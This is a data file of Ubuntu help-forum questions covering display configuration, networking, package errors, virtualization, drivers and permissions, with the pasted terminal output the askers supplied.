monitor '' identifier `` 0-dfp7 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' option `` preferredmode '' `` 1920x1080 '' option `` targetrefresh '' `` 60 '' option `` position '' `` 0 0 '' option `` rotate '' `` normal '' option `` disable '' `` false '' endsection section `` device '' identifier `` amdcccle-device [ 1 ] -0 '' driver `` fglrx '' option `` monitor-dfp7 '' `` 0-dfp7 '' busid `` pci:1:0:0 '' endsection section `` device '' identifier `` amdcccle-device [ 1 ] -1 '' driver `` fglrx '' option `` monitor-dfp6 '' `` 0-dfp6 '' busid `` pci:1:0:0 '' screen 1 endsection section `` screen '' identifier `` default screen '' defaultdepth 24 endsection section `` screen '' identifier `` amdcccle-screen [ 1 ] -0 '' device `` amdcccle-device [ 1 ] -0 '' defaultdepth 24 subsection `` display '' viewport 0 0 depth 24 endsubsection endsection section `` screen '' identifier `` amdcccle-screen [ 1 ] -1 '' device `` amdcccle-device [ 1 ] -1 '' defaultdepth 24 subsection `` display '' viewport 0 0 depth 24 endsubsection endsection edit 1 : if i enable xinerama i can not get unity 3d to start . unity2d starts automatically . btw . : i am using an amd 6850 .
116122	how do i start a service after the network is up ?	in my case , squid is started before dhcp has written a new /etc/resolv.conf which results in odd errors ( timeouts , 504 gateway ) when i try to load a page in the web browser . as i see it , the correct solution would be to start squid only after dhcpd/networkmanager/whoever ( ? ) has finished configuring the network .
116126	http ( s ) based file server	i 've got a server running ubuntu 10.04 . i 've already gotten openssh for ssh and sftp on it . i 've been looking for a web-based ( http , or preferably https ) file server , perhaps a web-front-end to an ( s ) ftp server , that allows access to a specific folder , and also allows uploads . it requires user authentication , preferably using pam . this web-based solution is for users that are not allowed to use ftp software / browser extension and do n't have flash / java browser plugins within their corporate environments . so far i have looked into : webmin : includes a file manager , however it uses java , and i 'm looking for a plugin-free implementation . apache2 : i was able to set up https and pam authentication , but the barebone implementation does n't include file upload ( as far as i 'm aware of ) . hfs : have n't tried it out because it is for windows/wine only , and i do n't want to run it under wine .
116135	how can i limit disk access bandwidth for a virtual machine guest ?	i have a virtualbox on my ubuntu ( host ) that serves few windows guest os . sometimes the running windows virtual machine starts massive access to the disk which blocks me in my host environment . i would like to limit the read/write of data access to the physical harddisk . how can i do it ?
116139	no wireless on hp dv6tse with centrino n-1000	i been using ubuntu 10.10 for the past year or so on my laptop with no issue on my wireless . then i upgraded to 11.04 and 11.10 with no issue no my wireless card neither . but yesterday i did a clean install straight to 11.10 and my wireless is not working at all . the connection panel shows wireless is disabled by hardware switch . i have button on my keyboard to enable/disable the wireless and the light is in red as in disabled but when i click to enable it nothing happens . if anyone can help i would appreciate it . if you ask me i believe ubuntu is using the wrong driver . how can i be sure ? hardware info : http : //pastebin.com/hbag34nq
116140	create a menu item to sent to pen drive ?	im very new to ubuntu linux environment and loving it . can some one suggest me how to insert a plugged in usb storage to copy to menu in ubuntu 11.10. how one can copy to move to a removable drive am not sure how that can be incorporated . windows example http : //kb.sandisk.com/euf/assets/images/faqs/104/id104-st-win7-4.gif ubuntu copy to menu http : //3.bp.blogspot.com/-bfsp-nudnto/togj_qoik4i/aaaaaaaaahe/dlpchuacu1s/s1600/install-playerstage-extracting-tar.gz.png
116144	how do i run apache as root ?	ok i need to run my apache web server as root . for this i typed echo whoami ; in terminal . it gives me output : root . but when i check my apache server running as a root user or not by executing following php-script : < ? php echo `whoami` ; ? > it gives me output : nobody . so any suggestions to execute/login as a root user in apache ? ?
116145	limit unity 's scope to virtual workspace ?	when i click a unity icon it shows smaller versions of all the windows for that program . so for example , if i have 3 terminals open , and click the unity terminal icon i see all 3 windows to select for focus . is it possible to limit it to only show windows for the program that exist in the current virtual workspace ?
116146	can not launch an application , 'no such file or directory ' but it exists	the folder exists , the application has been made executable . but when i run it i get the following message : pst007x @ pst007x-aspire-5741 : ~ $ /home/pst007x/applications/clipgrab/clipgrab bash : /home/pst007x/applications/clipgrab/clipgrab : no such file or directory pst007x @ pst007x-aspire-5741 : ~ $ thanks note : as suggested below pst007x @ pst007x-aspire-5741 : ~ $ file /home/pst007x/applications/clipgrab/clipgrab /bin/bash /home/pst007x/applications/clipgrab/clipgrab : elf 32-bit lsb executable , intel 80386 , version 1 ( sysv ) , dynamically linked ( uses shared libs ) , for gnu/linux 2.6.15 , buildid [ sha1 ] =0x22c8628796d72d721cf46293fe1d83b965de6df0 , stripped /bin/bash : elf 64-bit lsb executable , x86-64 , version 1 ( sysv ) , dynamically linked ( uses shared libs ) , for gnu/linux 2.6.15 , buildid [ sha1 ] =0x7ea55c6b94d32a06887081649ec990fd70700455 , stripped pst007x @ pst007x-aspire-5741 : ~ $ note : as suggested below pst007x @ pst007x-aspire-5741 : ~/applications/clipgrab $ ls -l total 588 -rwxrwxrwx 1 pst007x pst007x 388096 mar 26 14:50 clipgrab -rwxrwxr-x 1 pst007x pst007x 194397 feb 11 04:07 clipgrab-3.1.3.0.bz2 -rwxrwxr-x 1 pst007x pst007x 15981 feb 13 00:46 clipgrab icon.jpg pst007x @ pst007x-aspire-5741 : ~/applications/clipgrab $ note : as suggested below pst007x @ pst007x-aspire-5741 : ~ $ cd /home/pst007x/applications/clipgrab/ pst007x @ pst007x-aspire-5741 : ~/applications/clipgrab $ ./clipgrab bash : ./clipgrab : no such file or directory pst007x @ pst007x-aspire-5741 :
116150	can i assign custom keyboard shortcuts to custom ( non-default ) unity lenses ?	i installed the recoller lense ( http : //www.webupd8.org/2012/03/recoll-lens-full-text-search-unity-lens.html ) and now finally have fulltext search in dash . file lense is opened with super+f , music with super+m and so on . can ( and how can ) i assing such a shortuct to this new lense ?
116151	how to change resolution to 1920 x 1080 ?	the display looks a bit stretched and there is a system pop-up that says something like `` resolution notice : for best quality change resolution to 1920 x 1080 '' but in monitor preferences the only choices in the resolution drop-down are 1600 x 1200 ( the current setting ) , 1280 x 1024 , and less ( which all look worse ) . the monitor preferences calls the monitor `` unknown , '' the monitor is a viewsonic vx2450wm , and the pc is an hp p7-1120 .
116155	custom lightdm sessions to launch an application	i 'm trying to set up ubuntu to act as a kiosk running a custom application , and am trying to get a lightdm session built to automatically start it . ideally , i 'd like to have two sessions available from lightdm . the default would start my application fullscreened , and the other would open a minimal desktop in case any configuration ( mostly connecting to a wireless network ) needed to be done . i 've done a lot of research over the last week on custom lightdm & gnome sessions . i 've got a custom greeter written for lightdm that can start either session , but i ca n't figure out how to add a specific application to the gnome session that is ultimately started without just putting a launcher in the global startup directory , and i do n't want to do that since i do n't want the application starting when they open `` configuration mode '' . another problem i 've run into on my current workaround is that the application does n't fullscreen properly , which makes me think i 'm not starting enough of a gnome session ( currently it 's just metacity , no panel or anything else ) . edit : i found a solution . see http : //www.webupd8.org/2011/11/make-applications-autostart-only-in.html
116156	do i need to reinstall language environments ?	i recently installed ubuntu 11.10 ( using wubi ) and want to make it my main development environment . i have java , ruby , gcc , haskell , python ( and the list goes on ) environments , compilers and packages installed on the same machine under windows xp . now my simple question : do i need to reinstall the above for appropriate working on ubuntu or can i use them by accessing the files on /host/ ? or does it differ for each language environment ?
116157	how do i install a scanner driver for a brother mfc-7420 ?	i am having difficulty installing driver for my mfc-7420 scanner . i got the printer portion right . but i think i may have got wrong driver downloaded for scanner . now i think i have right one but wo n't let me install . help !
116174	how can i configure juju for deployment on hp cloud ?	hp cloud has a new cloud service out based on open stack . how can i configure my environments.yaml to connect to the new service ?
116175	why does ubuntu 11.10 take so much of power ?	i have a dell xps laptop . it works for almost 3.5 hours while running windows but while running ubuntu11.10 the power lasts for only 1 hour . is there something odd in the os ? ?
116177	how well does intel 3000 hd work ?	right now i have notebook with nvidia 8400m gs ( i know , it 's not good card ) and it 's impossible to work normally when i 'll plugin external monitor ( 1920x1080 ) . windows 7 can deal with it without problems ( 1440x900 on notebook + 1920x1080 external ) . on ubuntu i have to choose one screen and turn off the second one . even with only one screen ubuntu ( unity or even gnome3 ) sometimes hangs for a while , i 've not found solution for this yet , but nevermind , it 's probably because of my card or/and nvidia 's drivers . i 'm going to buy new pc , but for now only with integrated intel 3000hd , and my question is : should i expect similar problems with this card ? here i 've found link to intel 's webpage about drivers - `` only community develop them '' , and i 'm a bit concerned . i 'll use then only one monitor ( the bigger one ) , but how well does those driver work ? are there any performance tests ?
116180	is it safe to run upgrade with pinned applications in synaptic	i have firefox , thunderbird , thunderbird-locale-en , thunderbird-locale-en-us , xul-ext-calendar-timezones , xul-ext-gdata-provider and xul-ext-lightning pinned in synaptic . when i run apt-get upgrade . i get the following the following packages will be upgraded : boot-repair boot-sav darktable firefox libvlc5 libvlccore5 thunderbird thunderbird-locale-en thunderbird-locale-en-us vlc vlc-data vlc-nox vlc-plugin-notify vlc-plugin-pulse xul-ext-calendar-timezones xul-ext-gdata-provider xul-ext-lightning 17 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . need to get 53.0 mb of archives . after this operation , 606 kb of additional disk space will be used . do you want to continue [ y/n ] ? are these packages really going to be upgraded ?
116182	how to secure ubuntu for a non-technical user ? ( your mom )	my mother will be traveling for a while and i need to provide her with a secure laptop so she can work . a windows laptop is out of the question because : she 'll be logging into dodgy hotel wireless networks and conference networks price of the windows license to install on a netbook i 've installed libreoffice , media players and skype on it . also enabled ssh so i can intervene but i am worried that i might not be in a position to do so . possible threats : web browsing usb sticks insecure networks prone to intrusions malware ssh/vnc vulnerabilites skype vulnerabilities all the `` securing ubuntu '' guides out there assume the user has a certain level of technical knowledge but this is not the case with moms in general . if a malware can gain even user level access it might compromise her files .
116185	can i move to another hard drive whitout reinstalling ubuntu ?	my hdd memory is 80gb but i have another 300gb hdd . can i copy all files from 80gb to 300gb and than will it work good like working now . or if there another way to do this . thanks .
116186	ubuntu 10.10 usb drive not showing	usb is detecting but not showing the drives or mount details . nothing there inside my /media folder and /mnt folder . i already enabled automatic mount and give privilege to user also . my sudo fdisk -l shows like : disk /dev/sda : 250.1 gb , 250059350016 bytes 255 heads , 63 sectors/track , 30401 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000d3ba7 device boot start end blocks id system /dev/sda1 * 1 29637 238053376 83 linux /dev/sda2 29637 30402 6142977 5 extended /dev/sda5 29637 30402 6142976 82 linux swap / solaris any idea ?
116188	how to automatically run commands on ssh connection ?	i have some amazon ec2 instances that run ubuntu 10.04.1 lts . every time i connect to those instances i run a couple of simple commands , like a cd < repository > , a git status etc . how can i add them to a script / to which script should i add them so they would be automatically ran every time , on ssh connect ?
116192	mubi installer for mac ( similiar to wubi for windows )	any idea when would the mubi installer would be release for mac .
116193	gsm-ussd gives device busy or error ( 100 )	i am using gsm-ussd to try and query my data balance from my 3g modem . when i issue the commands gsm-ussd -m /dev/ttyusb0 '*188 # ' or gsm-ussd -m /dev/ttyusb2 '*188 # ' i get either `` device or resource busy '' ( when it is in used and connected ) or `` unknown error ( 100 ) '' . my device ( huawei e173 ) seems to create 3 devices in /dev , namely ttyusb0 , ttyusb1 and ttyusb2 . none of them work , and ttyusb1 gives a somewhat different problem , as it just give the following message : * wrong modem device ( use -m < dev > ) ? * modem broken ( no reaction to at ) update i found the following post , but i am already doing what it says : http : //mybroadband.co.za/vb/showthread.php/382977-8-ta-e173-on-opensuse-with-ussd-setup
116195	`` the created usb device will not boot off a mac . ''	i tried to make my usb drive for ubuntu using unetbootin but after it finished loading the os on usb drive , i get this message : `` the created usb device will not boot off a mac . insert it into a pc , and select the usb boot option in the bios boot menu . '' anybody has any idea ?
116202	change the login screen background and logo ?	how to change the login screen background as well as the logo that is placed down , without using any tool like simple lightdm manager ?
116209	how to backup programs to dvd	is there any way to backup installed programs to dvd . for example when i will install new ubuntu to install software from the disk and not from the internet .
116212	error : no suitable device found : no active connection or device	i am trying to ssh to a machine and initiate a vpn , created whilst in front of the machine through gnome ( ubuntu 10.04.4 lts ) ; $ nmcli con name uuid type scope timestamp-real auto eth0 ebd17105-b46d-4405-893e-4da47c592861 802-3-ethernet system never br0 3f94195e-bece-45a4-af6f-400879063ea6 802-3-ethernet system never name uuid type scope timestamp-real testvpn 0da910b2-e094-43ed-8c12-fd078fe7d52a vpn user tue 12 jul 2011 22:52:39 bst myvpn c6157e94-3713-498d-a9a7-35eb1aae40ab vpn user mon 11 jul 2011 22:01:16 bst $ nmcli con up id myvpn error : no suitable device found : no active connection or device . i have been searching the internet but ca n't find any answers . i think it must be something to do with the fact that eth0 is a member of bridge br0 ( i run kvm machines ) , and i get the same error on another machine which again , has eth0 in br0 , for use with kvm . do i need to tell nmcli perhaps that br0 is active ?
116215	no mbr options in `` boot repair ''	i started trying to fix my xp boot ( ca n't get ' earlier ques ' ca n't boot xp after ubuntu installation , how to fix ? ) . but while getting into the right tab ' it 's blank ! here a picture : http : //up353.siz.co.il/up2/iqym3ndxoytj.png thanks !
116222	how to remove themes ?	how do i completely remove a theme in ubuntu ? i want to remove the ambiance and radiance themes , i am using adwaita as a replacement and also i am using gnome . using ubuntu 11.10
116224	dash application icons not in alphabetical order	the installed icons within the applications lens on my unity dash are not in alphabetical order . i imagine there 's a simple fix , but i do n't know what to do . i 've searched for a solution , but every reference to icon order i 've seen has been for the launcher , not the dash . i 'm using 12.04 beta 1 and unity 5.8.0 ...
116227	can not add custom keyboard shortcut	i 'm trying to assign custom shortcut to launch my own script ( i do n't need it in terminal window , just launch it ) so , i went to settings - > keyboard - > shortcuts - > custom shortcuts , pressed the button with `` + '' and entered the name of shortcut and the command itself . but then i can not bind keys to that shortcut . i selected a new row and pressed needed keys ( shift + f3 ) and nothing happens . i can change the keys for system shortcuts , but do not have any luck with my own . any ideas ?
116232	gbrainy trains the brain true or false	i sometimes use gbrainy en was wondering does it really train the brain or not cause there are a lot of brain training software but after some reading . i found out that they do n't actually my question is does gbrainy really train your brain or not ?
116238	ubuntu 11.10 , wireless connection but no internet	right after installing ubuntu 11.10 using the wubi.exe file , i tried to surf the web in ubuntu . my wireless connection is found without problem , but firefox does n't manage to load any pages . can somebody help me out ? please let me know which results of commands in the terminal i have to post .
116239	ca n't remove burg theme packages	today after trying to install and remove burg and few themes i faced an issue . now i ca n't install or remove anything . here is the output ( unfortunately partly in finnish , i could n't change language since it also seems to depend on package listings : lassi @ lassi-ubuntu : ~ $ sudo apt-get autoremove luetaan pakettiluetteloita ... valmis muodostetaan riippuvuussuhteiden puu luetaan tilatietoja ... valmis seuraavat paketit poistetaan : burg-theme-fortune burg-theme-gnome burg-theme-picchio 0 päivitetty , 0 uutta asennusta , 3 poistettavaa ja 0 päivittämätöntä . 3 ei asennettu kokonaan tai poistettiin . toiminnon jälkeen vapautuu 7 180 k t levytilaa . haluatko jatkaa [ k/e ] ? k ( luetaan tietokantaa ... 166462 files and directories currently installed . ) poistetaan pakettia burg-theme-fortune ... sudo : update-burg : command not found dpkg : virhe käsiteltäessä burg-theme-fortune ( -- remove ) : aliprosessi installed post-removal script palautti virhetilakoodin 1 poistetaan pakettia burg-theme-gnome ... sudo : update-burg : command not found dpkg : virhe käsiteltäessä burg-theme-gnome ( -- remove ) : aliprosessi installed post-removal script palautti virhetilakoodin 1 poistetaan pakettia burg-theme-picchio ... sudo : update-burg : command not found dpkg : virhe käsiteltäessä burg-theme-picchio ( -- remove ) : aliprosessi installed post-removal script palautti virhetilakoodin 1 käsittelyssä tapahtui liian monta virhettä : burg-theme-fortune burg-theme-gnome burg-theme-picchio e : sub-process /usr/bin/dpkg returned an error code ( 1 ) basically what seems to happen is this : it creates the package lists , then tries to remove packet burg-theme-fortune . this fails as update-burg command was not found . then dpkg reports an error while processing the packet . same goes with all 3 packages . in the end it claims that there were too many errors , and packages stay installed . i also tried installing burg as it tries to run command update-burg , but appears that it tries to delete these packages always when i try to install or remove or do anything with apt . any ideas how i could solve this issue ? edit : here is the output of apt-get install burg ( tried installing again to get english output ) lassi @ lassi-ubuntu : ~ $ lc_all=c sudo apt-get install burg [ sudo ] password for lassi : reading package lists ... done building dependency tree reading state information ... done burg is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 3 not fully installed or removed . need to get 0 b/6169 kb of archives . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 167497 files and directories currently installed . ) preparing to replace burg-theme-fortune 0.5.0-1 ( using ... /burg-theme-fortune_0.5.0-1_all.deb ) ... unpacking replacement burg-theme-fortune ... generating burg.cfg ... /usr/sbin/burg-probe : error : can not stat `/boot/burg/locale ' . no path or device is specified . try `/usr/sbin/burg-probe -- help ' for more information . dpkg : warning : subprocess old post-removal script returned error exit status 1 dpkg - trying script from the new package instead ... generating burg.cfg ... /usr/sbin/burg-probe : error : can not stat `/boot/burg/locale ' . no path or device is specified . try `/usr/sbin/burg-probe -- help ' for more information . dpkg : error processing /var/cache/apt/archives/burg-theme-fortune_0.5.0-1_all.deb ( -- unpack ) : subprocess new post-removal script returned error exit status 1 generating burg.cfg ... /usr/sbin/burg-probe : error : can not stat `/boot/burg/locale ' . no path or device is specified . try `/usr/sbin/burg-probe -- help ' for more information . dpkg : error while cleaning up : subprocess new post-removal script returned error exit status 1 preparing to replace burg-theme-gnome 0.5.0-1 ( using ... /burg-theme-gnome_0.5.0-1_all.deb ) ... unpacking replacement burg-theme-gnome ... generating burg.cfg ... /usr/sbin/burg-probe : error : can not stat `/boot/burg/locale ' . no path or device is specified . try `/usr/sbin/burg-probe -- help ' for more information . dpkg : warning : subprocess old post-removal script returned error exit status 1 dpkg - trying script from the new package instead ... generating burg.cfg ... /usr/sbin/burg-probe : error : can not stat `/boot/burg/locale ' . no path or device is specified . try `/usr/sbin/burg-probe -- help ' for more information . dpkg : error processing /var/cache/apt/archives/burg-theme-gnome_0.5.0-1_all.deb ( -- unpack ) : subprocess new post-removal script returned error exit status 1 generating burg.cfg ... /usr/sbin/burg-probe : error : can not stat `/boot/burg/locale ' . no path or device is specified . try `/usr/sbin/burg-probe -- help ' for more information . dpkg : error while cleaning up : subprocess new post-removal script returned error exit status 1 preparing to replace burg-theme-picchio 0.5.0-1 ( using ... /burg-theme-picchio_0.5.0-1_all.deb ) ... unpacking replacement burg-theme-picchio ... generating burg.cfg ... /usr/sbin/burg-probe : error : can not stat `/boot/burg/locale ' . no path or device is specified . try `/usr/sbin/burg-probe -- help ' for more information . dpkg : warning : subprocess old post-removal script returned error exit status 1 dpkg - trying script from the new package instead ... generating burg.cfg ... /usr/sbin/burg-probe : error : can not stat `/boot/burg/locale ' . no path or device is specified . try `/usr/sbin/burg-probe -- help ' for more information . dpkg : error processing /var/cache/apt/archives/burg-theme-picchio_0.5.0-1_all.deb ( -- unpack ) : subprocess new post-removal script returned error exit status 1 generating burg.cfg ... /usr/sbin/burg-probe : error : can not stat `/boot/burg/locale ' . no path or device is specified . try `/usr/sbin/burg-probe -- help ' for more information . dpkg : error while cleaning up : subprocess new post-removal script returned error exit status 1 errors were encountered while processing : /var/cache/apt/archives/burg-theme-fortune_0.5.0-1_all.deb /var/cache/apt/archives/burg-theme-gnome_0.5.0-1_all.deb /var/cache/apt/archives/burg-theme-picchio_0.5.0-1_all.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) lassi @ lassi-ubuntu : ~ $
116241	virtualbox verr_access_denied error	i installed ubuntu 11.10 on vbox . the vbox settings i use have been tried and proven for countless other installs i have done in the past . those are still up and running . on my latest install of ubuntu 11.10 on vbox , things were working well in the initially - i installed guest additions and everything was fine . all of a sudden ( i was just moving my mouse ) , i get an accessed denied error that freezes my entire ubuntu environment . i close the virtual machine and restart it , but now i keep getting this error message : any help would be greatly appreciated .
116243	apt-get update fails due to `` unable to connect to localhost:8250 '' error	im trying to run sudo apt-get update . i know the server is up and my internet is working . any clues ? sudo apt-get update err http : //ppa.launchpad.net oneiric inrelease err http : //archive.canonical.com oneiric inrelease err http : //ppa.launchpad.net oneiric release.gpg unable to connect to localhost:8250 : err http : //archive.canonical.com oneiric release.gpg unable to connect to localhost:8250 : reading package lists ... done w : failed to fetch http : //archive.canonical.com/ubuntu/dists/oneiric/inrelease w : failed to fetch http : //archive.canonical.com/ubuntu/dists/oneiric/release.gpg unable to connect to localhost:8250 : w : some index files failed to download . they have been ignored , or old ones used instead .
116252	how do i get nymgo working ?	i have installed nymgo software on ubuntu os 11.10 . nymgo application crashes very often . i have installed this using wine . could you tell me some methods to debug the actual cause of crashing of the application . if there are no suggestions to get nymgo 's own client working , then please give the best alternatives that would work with this voip service .
116254	how to downgrade from php 5.4 to 5.3	recently i upgraded php to 5.4 , but it seems to be failing on me because apc is n't working with it , however this gave me no choice but to downgrade to 5.3 , how can i do this ? i executed apt-get remove php5 and apt-get purge php5 then i removed the 5.4 repo from apt-get then executed apt-get install php5 , it says it was installing 5.3 , and i restarted php-fastcgi and php5-fpm but when i run php -v it says 5.4 . how can i downgrade from 5.4 to 5.3 ? my server is running ubuntu 11.04 .
116256	how to record both audio , where i have one music running and my microphone is in use ?	i have one music playing , and i have microphone open , already the microphone is used by other application . in such case , how can i record that music and the microphone audio to a file ? ( if possible with command line ) . follow up : $ rec new-file.wav input file : 'default ' ( alsa ) channels : 2 sample rate : 48000 precision : 16-bit sample encoding : 16-bit signed integer pcm in:0.00 % 00:00:25.94 [ 00:00:00.00 ] out:1.24m [ | ] clip:0 ^c $ sox âd new-file.wav
116257	adding debian sid as package repository ?	i am running 12.04 precise beta ( upgraded from 11.10 oneiric ) and i added the following line to my /etc/apt/source.list : deb http : //http.us.debian.org/debian unstable main contrib non-free in order to get a newer version of a package ( octave 3.6 ) that i needed but was not available in the precise repository . this worked fine , but now when i want to upgrade there is a large number of packages that need to get updated . i assume this is because sid has newer versions of many of the packages than precise . i 've temporarily disabled the sid repository , and this works fine - however i am curious to know what would happen if i allowed all those upgrades to go through ? would it break my system ? are the structures of ubuntu precise and debian sid repositories fundamentally different somehow ?
116261	no ui or default configuration found ?	i created a custom ubuntu 11.10 amd64 desktop based distro using remastersys , but whenever i try to boot using the iso file in vmware , it shows this error : no ui or default configuration found i 've tried changing the name of isolinux to syslinux but that did n't help me either ! i also tried using unetbootin but it also does n't boot , and tried everything possible but to no avail . there is a similar question but it is about 10.10 and 32 bit , but that did n't solve my issue and also as this is a custom distro , the solution could be different . i 've also tried creating images using remastersys again and again but that did n't help either . please help me its very urgent !
116262	how do you hibernate/suspend ubuntu like windows or both at the same time ?	i 'm using an asus laptop with windows 7 , and i just installed ubuntu alongside windows yesterday , using the no-risk option . i noticed , though , that i ca n't hibernate ubuntu the way i did with windows to save time , and , every time i use ubuntu , i have to shut down to go into windows , which has a slow boot . is there any way that i could have windows and ubuntu hibernated at the same time so i can access both easily ( preferably without having to hit a function key within seconds ) . when i try to hibernate or suspend ubuntu with windows shut down , the screen just turns blue and does n't shut the computer off like a windows hibernate or sleep .
116264	how do i get the touchscreen working on a vaio vpcl237fx ?	tried searching but no one has this model/series it seems . anyone know of any working touchscreen drivers for the vaio vpcl2xxx series desktop all in ones ? device is nextwindow voltron
116272	my hard disk drive is not visible until i use it	so , suddenly something went wrong . at the beggining of my ubuntu usage it was all right , but from about 2-4 weeks i 've got this problem : whenever i try to reach my hdd , i have to open it first by files explorer . example : i use text editor . last file fails to load , so i got to open it manually . it 's in bookmarked file . i want to reach my bookmark , which is on hdd ( partition for both ubuntu and windows , ntfs ) . if i want to reach my bookmark , i have to go there manually ( or at least to hdd , then bookmarks pops up ) . it also does n't appear at my side bar until i use it . it kinda looks like it was n't mounted till then , i do n't know . it would be nice if i could deal with it , let 's say , automatically . thanks in advance .
116273	swap mouse buttons on startup	this one bugs me . i fashioned this handy script to swap the left and right mouse buttons over : [ my mouse is a razer ] /usr/bin/xinput set-button-map `xinput list | grep 'razer ' | grep -o \= [ 0-9 ] * | grep -o [ 0-9 ] * $ ` 3 2 1 4 5 6 7 8 1 10 11 12 13 when i run this in a terminal it works . when i go to startup application preferences - > add and then literally paste the above into the command field as an 'additional startup program ' it does not run on startup . why not ? i 'm using ubuntu 11-10 but this also applied to the 10-10
116276	how to set the desktop to $ home/desktop ?	recently i deleted the folder desktop from my $ home directory . when i logged in again all files and directories in $ home were shown on the desktop . so i wanted to get the folder back . what is the recommended way to achieve this ? i edited ~/.config/xdg-user-dirs.dir and added the correct variable . but i guess there must be some other ( more easy ? ) way .
116277	state : pending & public-address : null : : juju setup on local machine	i 've setup juju on a local vm inside vmware running on mac osx . everything seems to be working fine , except when i deployed mysql & wordpress from the examples , i get the following when i run juju status : danny @ ubuntu : ~ $ juju status machines : 0 : dns-name : localhost instance-id : local instance-state : running state : down services : mysql : charm : local : oneiric/mysql-11 relations : db : wordpress units : mysql/0 : machine : 0 public-address : 192.168.122.107 relations : db : state : up state : started wordpress : charm : local : oneiric/wordpress-31 exposed : true relations : db : mysql units : wordpress/0 : machine : 0 open-ports : [ ] public-address : null relations : { } state : pending state : pending and public-address : null ca n't find any documentation relating to this issue . any help very much appreciated - wonderful idea for a project !
116279	swap is not copied back into physical memory	i have a question regarding swap and physical memory . often times i run a program that requires a lot of memory and as a result i can see some of the data is copied from the physical memory into swap . however , once the program is terminated , and the physical memory is freed i can still see a considerable amount of data on swap which significantly slows down the system and is annoying ! what is the reason behind this and how does the os decide which part of data should go to swap ? how long is this data supposed to be there and how is it `` freed '' ?
116291	mono installation problem	i tried to apt-get install mono i got very very long error message . now i 'm trying to remove it to install again , i 'm getting similar errors which i pasted here in 1 . any ideas ?
116292	how do i remove compizconfig settings manager via the terminal ?	i 've recently installed ccsm , and it was giving me a hard time . so all i 'm asking is a terminal command line to remove it .
116296	effects still causing issues after uninstalling ccsm	i 've recently installed and uninstalled ccsm ( compizconfig settings manager ) , and after the uninstall , the effects were still there , and are very buggy . any tips ?
116299	microscope support	i work in a medical place where they want to move to linux ( and guess which distro i will recommend ^^ ) . but before i do this i need to find if there is such support for microscopes in ubuntu . in this specific case this model : http : //www.leica-microsystems.com/products/light-microscopes/clinical/upright-microscopes/details/product/leica-dm1000-led/ which is the one they are using in the lab . it includes a pci card that manages the microscope .
116300	change user 's primary group - have new files made in that group	i am setting up an environment where i am giving several users ssh access on my server . they are all trusted , but i want to corral them into a segment of the filesystem . i created the users like so : adduser username -ingroup groupname which works well enough . when i log in as one of them i can do this and get all the right answers : $ id -r -u -n username $ id -r -g -n groupname i switched my own user account 's primary group to groupname by doing this : $ usermod myuser groupname i then logged out and back in . now the files i would like the group to be able to access are under here : $ ls -l / | grep groupname drwxr-xr-x 3 root groupname 4.0k 2012-03-26 20:20 groupfiles $ cd /groupfiles $ ls -l drwxrwxr-x 2 root groupname 4.0k 2012-03-26 20:32 project the permissions are by design , members of the group can not alter files/folders under /groupfiles but they can add , edit , and delete under /groupfiles/project the problem i 'm having is that when i do this , i get the wrong group : $ touch test $ ls -l test -rw-rw-r -- 1 myuser myuser 0 2012-03-26 20:58 test $ id -r -g -n groupname i need to make it so that the files created by vim , touch , etc have the correct group . i 'm aware of newgrp ( ) and the setgid bits . these are not what i am looking for . this works fine for the new users 's i created , but does n't work for my user . i 'm not sure what happened , but it is working fine now . i 've just leave this question here for future tinkerers .
116302	unity launcher & transmission have strange behaviour	my unity launcher behaves weirdly as you can see i get two transmission icons in the launcher also at times transmission messes up ... eg : if i check the indicator menu of transmission , there is a tick mark on 'show transmission ' and yet i can not see the transmission window anywhere . this weird launcher behaviour messes my xbmc position too ... new apps icons load above xbmc and not below it ...
116309	how can i permanently disable the internal wifi adapter ?	i recently installed a linksys wireless-n notebook adapter w/dual-band ( wpc600n ) , which is working nicely via the pcmcia slot ; however , i can not find where to permanently disable the internal wifi adapter . currently , i 'm forced to manually disable it with each reboot .
116312	does the picasa 3.9 wine/winetricks/ie6 fix leave any vulnerabilities ?	i recently added picasa 3.9 to my ubuntu 11.10 machine using the technique from this askubuntu question : how would i install picasa 3.9 ? but i 'm wondering : does adding ie 6.0 ( or wine or winetricks ) leave my system vulnerable in any way ? since the ie 6.0 was added to allow picasa 3.9 login , i 'm concerned about entering my google account credentials , should i be ? thanks .
116319	how to disable chrome 's incognito mode ?	i use this extension called website blocker to discourage me from checking gmail/reddit . however , it is easy and tempting to open a new incognito window ; since extensions are disabled in incognito mode , i 'm still able to browse gmail/reddit while in incognito . is there any way to disable chrome 's incognito mode in ubuntu ? ideally , this would encourage me to use my smartphone as a dedicated gmail/reddit checker .
116322	why do flash players consume up to 20 times more cpu than vlc player to view exactly the same video file ?	when i play a video ( h264 mpeg4 avc 320x180 ) online ( in firefox or chrome ) it uses to consume up to 100 % cpu , but if i download it ( exactly the file played ) and use vlc - it takes just 5 % ( 6 % at maximum ) . why does this happen and what can i do to make on-line players more efficient ? ps : the video card is intel gma x4500hd .
116326	how do i find out what webcam driver is in use ?	i need to troubleshoot a webcam that stopped working correctly in ubuntu 12.04 . it 's always worked `` out of the box '' in the past so i have no idea what driver it uses . how do i go about looking that up ?
